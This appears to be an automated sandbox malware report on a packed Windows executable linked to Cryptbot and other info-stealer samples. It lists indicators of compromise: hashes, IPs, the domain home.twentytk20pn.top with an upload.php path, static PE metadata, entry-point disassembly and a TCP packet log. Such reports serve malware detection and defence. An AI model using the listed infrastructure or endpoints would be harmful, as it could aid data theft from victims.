                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        34.226.108.155kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                                  WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                                    oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                      2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                        f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                          1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                            147.45.113.159kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                            q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                            • twentytk20pn.top/v1/upload.php
                                                            fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                            ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                            • twentytk20pn.top/v1/upload.php
                                                            S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                            EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                            oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                            f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                            u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                            1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            httpbin.orgkGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 34.226.108.155
                                                            j6Nv9kUydV.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                            • 98.85.100.80
                                                            28PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 34.226.108.155
                                                            GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 34.226.108.155
                                                            fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            home.twentytk20pn.topkGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 147.45.113.159
                                                            q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                            • 147.45.113.159
                                                            fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                            • 147.45.113.159
                                                            S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 147.45.113.159
                                                            1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            s-part-0035.t-0009.t-msedge.nethttp://www.eventcreate.com/e/you-have-received-a-new-docGet hashmaliciousHTMLPhisherBrowse
                                                            • 13.107.246.63
                                                            gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                            • 13.107.246.63
                                                            zSmMqGGeVy.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            VajVW1leCd.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                            • 13.107.246.63
                                                            16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                            • 13.107.246.63
                                                            Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                            • 13.107.246.63
                                                            f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                            • 13.107.246.63

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            FREE-NET-ASFREEnetEUkGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 147.45.113.159
                                                            q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                            • 147.45.113.159
                                                            fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                            • 147.45.113.159
                                                            S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            f9bcOz8SxR.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 147.45.113.159
                                                            1o81tDUu5M.exeGet hashmaliciousUnknownBrowse
                                                            • 147.45.113.159
                                                            AMAZON-AESUSnshkppc.elfGet hashmaliciousMiraiBrowse
                                                            • 54.136.161.117
                                                            kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 34.226.108.155
                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                            • 3.221.94.196
                                                            HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 34.226.108.155
                                                            GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 34.226.108.155
                                                            ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                                            • 34.226.108.155
                                                            nsharm7.elfGet hashmaliciousMiraiBrowse
                                                            • 184.73.107.148
                                                            oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                            • 34.226.108.155

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            No created / dropped files found

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Entropy (8bit):7.985923339339859
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • VXD Driver (31/22) 0.00%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:Tsy9P2T9yF.exe
                                                            File size:4'448'768 bytes
                                                            MD5:03ae071235d37edc3ea30848462bccbc
                                                            SHA1:d8425df6c157fc8699596f64a0bf996692ebc947
                                                            SHA256:72662d9e82835cb7e3210889828befd75dd7921c8bb6c45f5757c23602432536
                                                            SHA512:2ef13be57bdebf61bf59e7b39a5c522f91ddb9d003a1a9a66b3fa9c7ef35ead57626858050ef2615ed87da4a32759328121e63fb46b2b4ce2f949caeea8871dc
                                                            SSDEEP:98304:96/aLUGOI+ds3fWZOf+6hrjqgYyHX83X/x6MmfIOe2AHk5JLr4D5:UyLUBI+do26hflYyHX+J6Zn0uJLr25
                                                            TLSH:B42633A712F301E9FCFAA6350B87D945F329AF66543DF41482A2E417C8C9A4971E03DE
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...`.......PD...@...................................D...@... ............................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0xf56000
                                                            Entrypoint Section:.taggant
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                            DLL Characteristics:DYNAMIC_BASE
                                                            Time Stamp:0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp 00007F804CEFB46Ah
                                                            xadd byte ptr [ebx+00h], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007F804CEFD465h
                                                            add byte ptr [edx+ecx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add ecx, dword ptr [edx]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add al, 0Ah
                                                            add byte ptr [eax], al
                                                            add ecx, dword ptr [edx]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            or dword ptr [eax+00000000h], eax
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add ecx, dword ptr [edx]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x61905f0x73.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6180000x2b0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb544a80x10zxrdxyue
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xb544580x18zxrdxyue
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x6170000x283e00217c879dadd83a810fd6167c7f77b7f4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x6180000x2b00x20098ff648a5d1828e549fdab78380a9ae1False0.798828125data5.990140429724783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0x6190000x10000x200e8fbf92e0939d0cd4935f0fe539e974dFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            0x61a0000x3840000x200bd178d238a0d920d59a5f131d77727bfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            zxrdxyue0x99e0000x1b70000x1b6800003ae60fe326f3f398c6f35654981727False0.9944245741875712data7.955163779925324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            xhtdnoyt0xb550000x10000x40003680617cb336b51ca6e0c7556abf117False0.755859375data6.086101486829323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0xb560000x30000x22006c5ef927ddf1f3cad124dbe324eb1dbdFalse0.05939797794117647DOS executable (COM)0.7196300324976413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0xb544b80x256ASCII text, with CRLF line terminators0.5100334448160535

                                                            Imports

                                                            DLLImport
                                                            kernel32.dlllstrcpy

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 20, 2024 17:30:30.704509020 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:30.704555988 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:30.704679966 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:30.716161013 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:30.716195107 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:32.453248978 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:32.453824043 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:32.453843117 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:32.455435991 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:32.455507040 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:32.456846952 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:32.456954002 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:32.469646931 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:32.469660044 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:32.522742033 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:32.806936026 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:32.807080984 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:32.807203054 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:32.818161964 CET49715443192.168.2.1134.226.108.155
                                                            Dec 20, 2024 17:30:32.818188906 CET4434971534.226.108.155192.168.2.11
                                                            Dec 20, 2024 17:30:34.329690933 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.449233055 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.450371027 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.451566935 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.571300983 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571388960 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571398973 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571413040 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571465969 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.571490049 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.571659088 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571669102 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571676970 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571686029 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571696997 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571707010 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.571744919 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.571782112 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.691131115 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.691277981 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.691301107 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.691318989 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.691332102 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.691354036 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.691365004 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.691381931 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.691421986 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.736269951 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.736499071 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.856357098 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:34.856455088 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:34.900114059 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.020225048 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.022742033 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.224143028 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.226675034 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.472481012 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.472601891 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.523629904 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.523829937 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.523893118 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.592262030 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.592379093 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.643419981 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.643522978 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.643552065 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.643589020 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.643621922 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.643666029 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.643738985 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.643779993 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.643788099 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.643862009 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.643898010 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.643908024 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.643943071 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.643980026 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.644094944 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.644149065 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.644174099 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.644222021 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.644239902 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.644249916 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.644289970 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.644309998 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.644408941 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.644460917 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.644562006 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.644619942 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.644762993 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.644773006 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.644819021 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.644925117 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645090103 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645100117 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645178080 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645386934 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645396948 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645541906 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645704985 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645715952 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645848036 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.645894051 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.645957947 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.646086931 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.646095991 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.646136999 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.646152973 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.646199942 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.646291971 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.646301031 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.646353960 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.646405935 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.646455050 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.712502956 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.712594986 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.763418913 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.763494968 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.763605118 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.763643980 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.763653994 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.763694048 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.763715029 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.763887882 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764030933 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764693022 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764741898 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764751911 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764806032 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764914036 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765167952 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.765577078 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765640974 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.765669107 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765717983 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.765770912 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765779972 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765840054 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.765883923 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766010046 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766061068 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766079903 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766124010 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766154051 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766207933 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766236067 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766244888 CET8049723147.45.113.159192.168.2.11
